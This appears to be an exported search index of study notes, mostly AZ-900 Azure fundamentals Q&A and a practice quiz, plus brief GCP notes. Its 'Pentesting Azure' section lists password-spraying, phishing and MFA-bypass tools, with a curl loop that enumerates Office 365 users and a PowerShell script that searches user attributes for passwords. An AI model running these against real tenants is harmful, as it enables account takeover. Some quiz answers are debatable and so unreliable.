        It allows for vast amounts of computing resources to be provisioned quickly, giving businesses a lot of flexibility and taking the pressure off capacity planning.

        What does \"elastically scaling\" mean in cloud computing?

        Delivering the right amount of IT resources, such as computing power and storage, at the right time and from the right location.

        How does cloud computing improve productivity?

        By removing the need for time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

        How does cloud computing improve performance?

        By running on a worldwide network of secure datacenters that are regularly upgraded to the latest generation of efficient computing hardware, reducing network latency and offering greater economies of scale.

        How does cloud computing improve reliability?

        By making data backup, disaster recovery, and business continuity easier and less expensive through data mirroring at multiple redundant sites on the cloud provider's network.

        How does cloud computing improve security?

        By offering a broad set of policies, technologies, and controls that strengthen the overall security posture, protecting data, apps, and infrastructure from potential threats.

        What is the main advantage of using cloud computing?

        Cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

        What is the biggest difference between cloud computing and traditional IT resources?

        Traditional IT resources required buying hardware and software, setting up and running on-site datacenters, and paying for electricity and IT experts. Cloud computing eliminates these expenses and provides flexible and on-demand resources.

        What are the benefits of cloud computing services?

        Faster innovation, flexible resources, and economies of scale.

        What is the advantage of cloud computing over traditional on-site datacenters?

        Cloud computing eliminates the need for hardware setup, software patching, and other time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

        What is the advantage of cloud computing over a single corporate datacenter?

        Reduced network latency for applications and greater economies of scale.

        What is the main advantage of data backup, disaster recovery, and business continuity in cloud computing?

        It is easier and less expensive.

        What is the main advantage of security in cloud computing?

        Cloud providers offer a broad set of policies, technologies, and controls that strengthen the overall security posture.

        What is the shared responsibility model in cloud computing?

        The shared responsibility model in cloud computing refers to the division of responsibilities between the cloud provider and the customer in terms of security tasks and workloads.

        What are the different types of cloud deployment?

        The different types of cloud deployment are Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and on-premises datacenter.

        In which type of deployment do customers retain the most responsibilities?

        In an on-premises datacenter, customers retain the most responsibilities, as they own the entire stack.

        What responsibilities are always retained by the customer, regardless of the type of deployment?

        The responsibilities retained by the customer regardless of the type of deployment are data, endpoints, account, and access management.

        In a SaaS deployment, which party is responsible for protecting the security of the data?

        In a SaaS deployment, the customer is responsible for protecting the security of the data.

        In a PaaS deployment, who is responsible for managing and maintaining the underlying infrastructure?

        In a PaaS deployment, the cloud provider is responsible for managing and maintaining the underlying infrastructure.

        In an IaaS deployment, who is responsible for managing and maintaining the operating systems and middleware?

        In an IaaS deployment, the customer is responsible for managing and maintaining the operating systems and middleware.

        What are the three broad categories of cloud computing services?

        Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS)

        What are the benefits of migrating your organization's infrastructure to an IaaS solution?

        Migrating to IaaS helps reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. It also gives you the flexibility to scale IT resources up and down with demand and quickly provision new applications.

        Is lift-and-shift migration a common business scenario for using IaaS?

        Yes. Lift-and-shift migration is a common business scenario for using IaaS. It is the fastest and least expensive method of migrating an application or workload to the cloud.

        What is PaaS and how does it differ from IaaS?

        Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. PaaS includes infrastructure such as servers, storage, and networking, but also middleware, development tools, business intelligence services, and more. IaaS only includes infrastructure resources.

        How does PaaS differ from SaaS?

        PaaS provides a complete development and deployment environment in the cloud, including infrastructure, middleware, development tools, and more. SaaS is a type of cloud service where users access software applications over the internet, without the need for installation or maintenance.

        How does SaaS work?

        With SaaS, users connect to the software over the Internet, usually with a web browser. The service provider manages the hardware and software, and with the appropriate service agreement, will ensure the availability and the security of the app and your data.

        What are some common examples of SaaS?

        Common examples of SaaS are email, calendaring, and office tools (such as Microsoft Office 365).

        What are the components of SaaS?

        The components of SaaS include hosted applications/apps, development tools, database management, business analytics, operating systems, servers and storage, networking firewalls/security, and data center physical plant/building.

        What are the benefits of using SaaS for an organization?

        SaaS provides a complete software solution that you purchase on a pay-as-you-go basis from a cloud service provider. It allows your organization to get quickly up and running with an app at minimal upfront cost.

        What is a region in Azure?

        A region in Azure is a geographical area on the planet that contains at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network.

        Why are regions important in Azure?

        Regions are important in Azure because they provide flexibility to bring applications closer to users no matter where they are, global regions provide better scalability and redundancy, and they preserve data residency for services.

        What are some examples of special Azure regions?

        Examples of special Azure regions include US DoD Central, US Gov Virginia, US Gov Iowa, China East, and China North.

        What are availability zones in Azure?

        Availability zones in Azure are created by using one or more datacenters, and there is a minimum of three zones available within a single region.

        What are region pairs in Azure?

        Each Azure region is paired with another region within the same geography (such as US, Europe, or Asia) at least 300 miles away. This allows for the replication of resources across a geography and helps reduce the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

        What are the advantages of region pairs in Azure?

        Region pairs in Azure include automatic geo-redundant storage and prioritization of one region out of every pair in the event of an extensive Azure outage. Planned Azure updates are rolled out to paired regions one region at a time to minimize downtime and risk of application outage.

        What is the purpose of region pairs in Azure?

        The purpose of region pairs in Azure is to provide reliable services and data redundancy by replicating resources across a geography and reducing the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

        What happens if a region in a region pair is affected by a natural disaster in Azure?

        If a region in a region pair is affected by a natural disaster in Azure, services will automatically failover to the other region in its region pair.

        How does Azure provide a high guarantee of availability?

        Azure provides a high guarantee of availability by having a broadly distributed set of datacenters, creating region pairs that are directly connected and far enough apart to be isolated from regional disasters, and offering automatic geo-redundant storage and failover capabilities.

        What is the difference between regions, geographies, and availability zones in Azure?

        In Azure, regions are geographical areas on the planet that contain at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network. Geographies refer to the larger geographical area that a region is located in, such as US, Europe, or Asia. Availability zones are created by using one or more datacenters and there is a minimum of three zones within a single region.

        What is an availability zone?

        Availability zones are physically separate datacenters within an Azure region that are equipped with independent power, cooling, and networking, and are connected through high-speed, private fiber-optic networks.

        What is the purpose of availability zones?

        The purpose of availability zones is to provide high availability for mission-critical applications by creating duplicate hardware environments, in case one goes down.

        How are availability zones connected?

        Availability zones are connected through high-speed, private fiber-optic networks.

        What types of Azure services support availability zones?

        VMs, managed disks, load balancers, and SQL databases support availability zones.

        What are zonal services?

        Zonal services are resources that are pinned to a specific zone, such as VMs, managed disks, and IP addresses.

        What are zone-redundant services?

        Zone-redundant services are services that the platform replicates automatically across zones, such as zone-redundant storage and SQL Database.

        What are non-regional services?

        Non-regional services are services that are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.

        What is a resource in Azure?

        A manageable item that's available through Azure. Virtual machines (VMs), storage accounts, web apps, databases, and virtual networks are examples of resources.

        What is a resource group in Azure?

        A container that holds related resources for an Azure solution. The resource group includes resources that you want to manage as a group.

        What is the purpose of a resource group in Azure?

        The purpose of a resource group is to help manage and organize Azure resources by placing resources of similar usage, type, or location in a resource group.
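
A minimal Azure CLI sketch of the resource-group lifecycle (all names are hypothetical):

```bash
# Create a resource group for one workload's resources
az group create --name app-prod-rg --location westeurope

# List the resources it contains
az resource list --resource-group app-prod-rg --output table

# Deleting the group deletes every resource inside it
az group delete --name app-prod-rg --yes
```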

        Can a resource belong to multiple resource groups in Azure?

        No, a resource can only be a member of a single resource group.

        Can resource groups be nested in Azure?

        No, resource groups can't be nested.

        What happens when a resource group is deleted in Azure?

        When a resource group is deleted, all resources contained within it are also deleted.

        How can resource groups be used for authorization in Azure?

        Resource groups are also a scope for applying role-based access control (RBAC) permissions. By applying RBAC permissions to a resource group, you can ease administration and limit access to allow only what's needed.
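
For example, a hedged Azure CLI sketch of scoping an RBAC assignment to a resource group; the UPN, role, and subscription ID are placeholders:

```bash
# Grant a user Reader access scoped to a single resource group.
# "alice@contoso.com", "app-prod-rg", and <subscription-id> are hypothetical.
az role assignment create \
  --assignee "alice@contoso.com" \
  --role "Reader" \
  --scope "/subscriptions/<subscription-id>/resourceGroups/app-prod-rg"
```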

        What is the relationship between resources and resource groups in Azure?

        All resources must be in a resource group, and a resource can only be a member of a single resource group.

        What is an Azure subscription?

        An Azure subscription is a logical unit of Azure services that links to an Azure account, which is an identity in Azure Active Directory (Azure AD) or in a directory that Azure AD trusts. It provides authenticated and authorized access to Azure products and services and allows you to provision resources.

        What are the two types of subscription boundaries in Azure?

        The two types of subscription boundaries in Azure are Billing boundary and Access control boundary.

        What happens when you delete a subscription in Azure?

        When you delete a subscription in Azure, all resources contained within it are also deleted.

        What is the purpose of creating a billing profile in Azure?

        The purpose of creating a billing profile in Azure is to give it its own monthly invoice and payment method.

        How can you manage costs in Azure?

        You can manage costs in Azure by creating multiple subscriptions for different types of billing requirements, and Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.

        What is the purpose of resource access control in Azure?

        The purpose of resource access control in Azure is to manage and control access to the resources that users provision within each subscription.

        What is the purpose of an Azure management group?

        Azure management groups provide a level of scope above subscriptions for efficiently managing access, policies, and compliance for those subscriptions.

        How do management groups affect subscriptions?

        All subscriptions within a management group automatically inherit the conditions applied to the management group.

        Can all subscriptions within a single management group trust different Azure AD tenants?

        No, all subscriptions within a single management group must trust the same Azure AD tenant.

        How can management groups be used for governance?

        You can apply policies to a management group that limit the regions available for VM creation, for example, which would be applied to all management groups, subscriptions, and resources under that management group.

        How can management groups be used to provide user access to multiple subscriptions?

        By moving multiple subscriptions under that management group, you can create one role-based access control (RBAC) assignment on the management group, which will inherit that access to all the subscriptions.
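
A minimal sketch with the Azure CLI, assuming hypothetical names and subscription ID:

```bash
# Create a management group and move a subscription under it;
# RBAC and policy applied at the group then flow down to the subscription.
az account management-group create --name corp-it --display-name "Corp IT"

az account management-group subscription add \
  --name corp-it \
  --subscription "<subscription-id>"
```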

        How many management groups can be supported in a single directory?

        10,000 management groups can be supported in a single directory.

        How many levels of depth can a management group tree support?

        A management group tree can support up to six levels of depth, not including the root level or the subscription level.

        Can each management group and subscription have multiple parents?

        No, each management group and subscription can support only one parent.

        Is each management group and subscription within a single hierarchy in each directory?

        Yes, all subscriptions and management groups are within a single hierarchy in each directory.

        | If you want to... | Use this |
        | --- | --- |
        | Provision Linux and Windows virtual machines in seconds with the configurations of your choice | Virtual Machines |
        | Achieve high availability by autoscaling to create thousands of VMs in minutes | Virtual Machine Scale Sets |
        | Get deep discounts when you provision unused compute capacity to run your workloads | Azure Spot Virtual Machines |
        | Deploy and scale containers on managed Kubernetes | Azure Kubernetes Service (AKS) |
        | Accelerate app development using an event-driven, serverless architecture | Azure Functions |
        | Develop microservices and orchestrate containers on Windows and Linux | Azure Service Fabric |
        | Quickly create cloud apps for web and mobile with a fully managed platform | App Service |
        | Containerize apps and easily run containers with a single command | Azure Container Instances |
        | Cloud-scale job scheduling and compute management with the ability to scale to tens, hundreds, or thousands of virtual machines | Batch |
        | Create highly available, scalable cloud applications and APIs that help you focus on apps instead of hardware | Cloud Services |
        | Deploy your Azure virtual machines on a physical server used only by your organization | Azure Dedicated Host |

        What is the key difference between vertical scaling and horizontal scaling?

        • Vertical scaling adds more processing power, while horizontal scaling increases storage capacity. (Incorrect)
        • Vertical scaling adjusts the capabilities of existing resources, while horizontal scaling adjusts the number of resources. (Correct)

        You are an IT manager and want to ensure that you are notified when the Azure spending reaches a certain threshold. Which feature of Azure Cost Management should you use?

        • Budgets (Correct)
        • Cost alerts (Incorrect)

        Which of the following tools is NOT available within the Azure Security Center for vulnerability management?

        • Azure Defender (Incorrect)
        • Azure Policy (Incorrect)
        • Azure Advisor (Incorrect)
        • Azure Firewall Manager (Correct)

        Your company makes use of several SQL databases. However, you want to increase their efficiency because of varying and unpredictable workloads. Which of the following can help you with this?

        • Resource Tags (Incorrect)
        • Elastic Pools (Correct)
        • Region Pairs (Incorrect)
        • Scale Sets (Incorrect)

        Just like Azure VM Scale Sets are used with VMs, you can use Elastic Pools with Azure SQL Databases!

        SQL Database elastic pools are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.
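
As an illustration, a hedged Azure CLI sketch of creating an elastic pool and placing a database in it; the server, pool, and database names plus sizing are hypothetical:

```bash
# Create an elastic pool on an existing logical server, then a database in it.
az sql elastic-pool create \
  --resource-group app-prod-rg \
  --server my-sql-server \
  --name my-pool \
  --edition Standard \
  --capacity 100

az sql db create \
  --resource-group app-prod-rg \
  --server my-sql-server \
  --name app-db \
  --elastic-pool my-pool
```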

        Which of the following alert types are available in the Cost Management service? (Select all that apply)

        • Resource usage alerts (Incorrect)
        • Budget alerts (Correct)
        • Department spending quota alerts (Correct)
        • Credit alerts (Correct)

        Azure Site Recovery can only be used to replicate and recover virtual machines within Azure.

        YES / NO

        The answer is No. Azure Site Recovery can be used to replicate and recover virtual machines not only within Azure, but also from on-premises datacenters to Azure, and between different datacenters or regions. Azure Site Recovery is a disaster recovery solution that provides continuous replication of virtual machines and physical servers to a secondary site, allowing for rapid recovery in case of a disaster. It supports a wide range of scenarios, including replication from VMware, Hyper-V, and physical servers to Azure, as well as replication between Azure regions or datacenters.

        The ability to provision and deprovision cloud resources quickly, with minimal management effort, is known as _.

        • Sustainability (Incorrect)
        • Scalability (Correct)
        • Elasticity (Incorrect)
        • Resiliency (Incorrect)

        The correct answer is Scalability. It specifically refers to the ability to provision and deprovision cloud resources quickly and with minimal management effort.

        • Resiliency: It refers to the ability of a system to recover quickly from failures or disruptions. While resiliency is an important attribute of cloud systems, it is not specifically related to the ability to provision and deprovision resources quickly.
        • Elasticity: It is the ability of a system to scale up or down in response to changes in demand. This is a closely related concept to scalability, but specifically refers to the ability to handle changes in workload or traffic.
        • Sustainability: It refers to the ability of a system to operate in an environmentally friendly manner, with minimal impact on the planet. While sustainability is an important consideration for cloud providers, it is not specifically related to the ability to provision and deprovision resources quickly.

        It's possible to deploy an Azure VM from a macOS-based system by using which of the following options?

        • Azure Powershell (Correct)
        • Azure Cloudshell (Correct)
        • Azure Portal (Correct)
        • Azure CLI (Correct)

        Which of the following can be included as artifacts in an Azure Blueprint? (Select all that apply)

        • Policy assignments (Correct)
        • Azure Resource Manager templates (Correct)
        • Role assignments (Correct)
        • Resource groups (Correct)

        Azure Service Health allows us to define the critical resources that should never be impacted due to outages and downtimes.

        YES / NO

        No. Azure Service Health notifies you about Azure service incidents and planned maintenance. Although you can see when maintenance is planned and act accordingly to migrate a VM if needed, you can't prevent service failures.

        It's possible to deploy a new Azure VM from a Google Chromebook by using Power Automate.

        YES / NO

        No. Tricky question! Power Automate is not the same as PowerShell.

        Which of the following services can help you assign time-bound access to resources using start and end dates, and enforce multi-factor authentication to activate any role?

        • Azure Privileged Identity Management (Correct)
        • Azure DDoS Protection (Incorrect)
        • Azure Security Center (Incorrect)
        • Azure Advanced Threat Protection (ATP) (Incorrect)

        Azure Active Directory (Azure AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in your organization. These resources include resources in Azure AD, Azure, and other Microsoft Online Services like Office 365 or Microsoft Intune.

        Which of the following actions can help you reduce your Azure costs?

        • Enabling automatic scaling for all virtual machines (Incorrect)
        • Increasing the number of virtual machines deployed (Incorrect)
        • Reducing the amount of data transferred between Azure regions (Correct)
        • Keeping all virtual machines running 24/7 (Incorrect)

        Reducing the amount of data transferred between Azure regions can help reduce costs by minimizing data egress charges.

        In the defense-in-depth model, what is the role of the "network" layer?

        • It secures access to virtual machines. (Incorrect)
        • It ensures the physical security of computing hardware. (Incorrect)
        • It limits communication between resources and enforces access controls. (Correct)
        • It focuses on securing access to applications. (Incorrect)

        The \"network\" layer in the defense-in-depth model is responsible for limiting communication between resources, which helps prevent the spread of attacks. It enforces access controls to ensure that only necessary communication occurs and reduces the risk of an attack affecting other systems.

        You want to restrict access to certain Azure resources based on departmental requirements within your organization. Which Azure feature would you use?

        • Resource groups (Incorrect)
        • Subscriptions (Correct)
        • Azure Active Directory (Incorrect)
        • Management groups (Incorrect)

        In this scenario, you would use subscriptions to restrict access to certain Azure resources based on departmental requirements. Subscriptions can be used to apply different access-management policies, reflecting different organizational structures. Azure applies access-management policies at the subscription level, which allows you to manage and control access to the resources that users provision within specific subscriptions.

        Which of the following affect costs in Azure? (Choose 2)

        • Availability Zone (Incorrect)
        • Instance size (Correct)
        • Location (Correct)
        • Knowledge center usage (Incorrect)

        The instance size and the location (e.g., US or Europe) affect prices. The Knowledge Center is completely free to use, and you aren't charged for an Availability Zone.

        Which of the following can be used to manage your Azure Resources from an iPhone?

        • Azure Portal (Correct)
        • Windows PowerShell (Incorrect)
        • Azure Cloud Shell (Correct)
        • Azure CLI (Incorrect)
        • Azure Mobile App (Correct)

        Azure CLI can be installed on macOS but it cannot be installed on an iPhone. PowerShell can be installed on macOS but it cannot be installed on an iPhone.

        It is possible to deploy Azure resources through a tablet by using Bash in the Azure Cloud Shell.

        No / Yes

        Yes. Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources (the key to everything, since all you need is a browser and the OS doesn't matter). It provides the flexibility of choosing the shell experience that best suits the way you work, either Bash or PowerShell.

        Which of the following services allows you to send events generated from Azure resources to applications?

        • Azure Event Hub (Incorrect)
        • Azure Event Grid (Correct)
        • Azure Cognitive Services (Incorrect)
        • Azure App Service (Incorrect)

        What Azure service provides recommendations to optimize your cloud spending based on your usage patterns?

        • Azure Monitor (Incorrect)
        • Azure Cost Management and Billing (Correct)
        • Azure Policy (Incorrect)
        • Azure Advisor (Incorrect)

        Azure Cost Management and Billing is the correct answer: it provides recommendations to optimize your cloud spending based on your usage patterns. The service provides insights and cost management tools to help you monitor, allocate, and optimize your cloud costs.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/pentesting-azure/","title":"Pentesting Azure","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#reconnaissance","title":"Reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#network-discovery","title":"Network discovery","text":"
        • Nmap
        • Masscan
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance","title":"DNS reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance_1","title":"DNS reconnaissance","text":"
        • GitHub - aboul3la/Sublist3r: Fast subdomains enumeration tool for penetration testers
        • GitHub - rbsec/dnscan
        • nslookup, host, dig
        • GitHub - darkoperator/dnsrecon: DNS Enumeration Script
        • GitHub - lanmaster53/recon-ng: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#certificate-transparency","title":"Certificate transparency","text":"
        • crt.sh | Certificate Search
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#miscellaneous","title":"Miscellaneous","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shodan","title":"Shodan","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#eyewitness","title":"Eyewitness","text":"

        GitHub - FortyNorthSecurity/EyeWitness: EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-discovery","title":"Azure Discovery","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#finding-tenantid","title":"Finding tenantID","text":"
        • https://enterpriseregistration.windows.net/company.com/enrollmentserver/contract?api-version=1.4
        • https://login.microsoftonline.com/getuserrealm.srf?login=username@company.com&xml=1

        • AADInternals

        • Invoke-AADIntReconAsOutsider -DomainName company.com
        • Get-AADIntTenantDomains -Domain company.com
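
The getuserrealm endpoint listed above can also be queried directly; a quick curl sketch, with the login value as a placeholder:

```bash
# Query the user realm for a target domain; the response indicates whether
# the namespace is Managed, Federated, or Unknown.
curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=username@company.com&xml=1"
```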
        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-ip-ranges","title":"Azure IP ranges","text":"

Download Azure IP Ranges and Service Tags – Public Cloud from the Official Microsoft Download Center

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#openid-configuration-document","title":"OpenID configuration document","text":"
• https://login.microsoftonline.com/<tenant>/v2.0/.well-known/openid-configuration
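
A quick curl sketch, using the target's verified domain in place of the tenant (company.com is a placeholder); the tenant GUID appears in the endpoint URLs of the JSON response:

```bash
# Fetch the tenant's OpenID configuration; look at token_endpoint /
# authorization_endpoint in the response for the tenant GUID.
curl -s "https://login.microsoftonline.com/company.com/v2.0/.well-known/openid-configuration"
```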

### Scrape Azure Resources

GitHub - lutzenfried/CloudScraper: CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.

          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#google-dorks","title":"Google Dorks","text":"
          • Reveal the Cloud with Google Dorks | by Mike Takahashi | Feb, 2023 | InfoSec Write-ups (infosecwriteups.com)
          • Useful Google Dorks for Open Source Intelligence Investigations - Maltego
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-repositories-and-leaked-credentials","title":"Public repositories and leaked credentials","text":"
          • gitleaks (https://github.com/zricethezav/gitleaks)
          • trufflehog (https://github.com/trufflesecurity/truffleHog)
          • git-secrets (https://github.com/awslabs/git-secrets)
          • shhgit (https://github.com/eth0izzle/shhgit)
          • gitrob (https://github.com/michenriksen/gitrob)
• dumpsterdiver: GitHub - securing/DumpsterDiver: Tool to search secrets in various filetypes.
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#enumeration","title":"Enumeration","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-storage-accounts-enumeration","title":"Public Storage Accounts Enumeration","text":"
          • Public Buckets (osint.sh)
          • Public Buckets by GrayhatWarfare
          • GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
• MicroBurst: Invoke-EnumerateAzureBlobs
• https://storagename.blob.core.windows.net/CONTAINERNAME?restype=container&comp=list (https://docs.microsoft.com/en-us/rest/api/storageservices/list-containers2) (see the example after this list)
          • GitHub - cyberark/BlobHunter: Find exposed data in Azure with this public blob scanner
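
The container-listing URL above can be tested with plain curl (the storage account and container names are placeholders):

```bash
# List blobs in a publicly readable container; an XML blob list in the
# response means anonymous listing is enabled.
curl -s "https://storagename.blob.core.windows.net/CONTAINERNAME?restype=container&comp=list"
```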
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#onedrive-enumeration","title":"OneDrive Enumeration","text":"
          • GitHub - nyxgeek/onedrive_user_enum: onedrive user enumeration - pentest tool to enumerate valid o365 users
          • https://www.trustedsec.com/blog/achieving-passive-user-enumeration-with-onedrive/
          ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#service-enumeration","title":"Service Enumeration","text":"
• PS C:\> Invoke-EnumerateAzureSubDomains -Base <base name> -Verbose
          • GitHub - 0xsha/CloudBrute: Awesome cloud enumerator
          • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#subdomain-takeover","title":"Subdomain Takeover","text":"
            • Subdomain Takeover in Azure: making a PoC | GoDiego
            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#user-enumeration","title":"User enumeration","text":"
            • GitHub - LMGsec/o365creeper: Python script that performs email address validation against Office 365 without submitting login attempts.
• https://login.microsoftonline.com/getuserrealm.srf?login=<username@company.com>&xml=1 (see the sketch below)
• GitHub - dirkjanm/ROADtools: A collection of Azure AD tools for offensive and defensive security purposes (authenticated)
            • GitHub - nyxgeek/o365recon: retrieve information via O365 and AzureAD with a valid cred
            • GitHub - DanielChronlund/DCToolbox: Tools for Microsoft cloud fans
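
As a sketch of the technique tools like o365creeper automate, each candidate user can be checked against the GetCredentialType endpoint; treating an IfExistsResult of 0 as a valid account is an assumption, since endpoint behavior can change:

```bash
# Check each candidate user against the GetCredentialType endpoint.
# users.txt is a hypothetical list of user@domain entries, one per line.
while read -r user; do
  exists=$(curl -s -X POST "https://login.microsoftonline.com/common/GetCredentialType" \
    -H "Content-Type: application/json" \
    -d "{\"Username\":\"${user}\"}" | grep -c '"IfExistsResult":0')
  [ "$exists" -gt 0 ] && echo "[+] Valid user: ${user}"
done < users.txt
```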
            • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shadow-admin-privileged-users-enumeration","title":"Shadow Admin / Privileged Users Enumeration","text":"
              • GitHub - cyberark/SkyArk: SkyArk helps to discover, assess and secure the most privileged entities in Azure and AWS
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#secrets-in-azure","title":"Secrets in Azure","text":"

Not sure if this still works: GitHub - FSecureLABS/Azurite: Enumeration and reconnaissance activities in the Microsoft Azure Cloud.

              Find credentials in

              • Environment variables or source code (Azure Function)
              • .publishsettings
              • Web & app config
```powershell
$users = Get-MsolUser -All
foreach ($user in $users) {
    $props = @()
    $user | Get-Member | ForEach-Object { $props += $_.Name }
    foreach ($prop in $props) {
        if ($user.$prop -like "*password*") {
            Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
        }
    }
}
```
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#initial-access-attack","title":"Initial Access Attack","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#password-spraying","title":"Password spraying","text":"
              • GitHub - SecurityRiskAdvisors/msspray: Password attacks and MFA validation against various endpoints in Azure and Office 365
              • GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
              • GitHub - MarkoH17/Spray365: Spray365 makes spraying Microsoft accounts (Office 365 / Azure AD) easy through its customizable two-step password spraying approach. The built-in execution plan features options that attempt to bypass Azure Smart Lockout and insecure conditional access policies.
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#bypass-conditional-access","title":"Bypass conditional access","text":"
• The Attackers Guide to Azure AD Conditional Access – Daniel Chronlund Cloud Security Blog
• How to Find MFA Bypasses in Conditional Access Policies - YouTube
• Getting started with ROADrecon · dirkjanm/ROADtools Wiki · GitHub
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#instance-metadata-service","title":"Instance Metadata Service","text":"
• Steal Secrets with Azure Instance Metadata Service? Don't Oversight Role-based Access Control | by Marcus Tee | Marcus Tee Anytime | Medium
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#phishing","title":"Phishing","text":"
• Illicit Consent Grant Attack
• Abusing Device Code Flow: OAuth's Device Code Flow Abused in Phishing Attacks | Secureworks
• Evilginx2: GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#lateral-movement","title":"Lateral movement","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#privilege-escalation","title":"Privilege escalation","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#persistence","title":"Persistence","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/containers/pentesting-docker/","title":"Pentesting docker","text":"

              https://www.panoptica.app/research/7-ways-to-escape-a-container

              ","tags":["cloud","docker","containers"]},{"location":"cloud/gcp/gcp-essentials/","title":"Google Cloud Platform (GCP) Essentials","text":"Sources of this notes
              • Udemy course: Google Cloud Platform (GCP) Fundamentals for Beginners

              Cheatsheets: gcloud CLI

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#basic-numbers","title":"Basic numbers","text":"
              • 20 regions
              • 61 zones
              • 134 network edge locations
              • 200+ countries and territories.

A region typically has three or more zones. A zone is the equivalent of a data center in Google Cloud.

              Overview of services:

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#signing-up-with-gcp","title":"Signing-up with GCP","text":"

New accounts are provided with $300 in free credits, valid for 90 days, to run more than 25 services for free.

              Link: https://cloud.google.com/gcp/

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#gcp-resources","title":"GCP resources","text":"

              In Google Cloud Platform, everything that you create is a resource. There is a hierarchy:

              • Everything that you create is a resource.
              • Resources belong to a project.
• A project directly represents a billable unit and has a credit card associated with it.
              • Projects may be organized into folders (like dev or production), which provide logical grouping of projects.
              • Folders belong to one and only one organization.
              • The organization is the top level entity in GCP hierarchy.

              If you use Google Suite, you will see the organization level and folders. If you don't, you will only have access to projects and resources.

To interact with GCP there are these tools: web console, Cloud Shell, Cloud SDK, mobile app, and REST API.

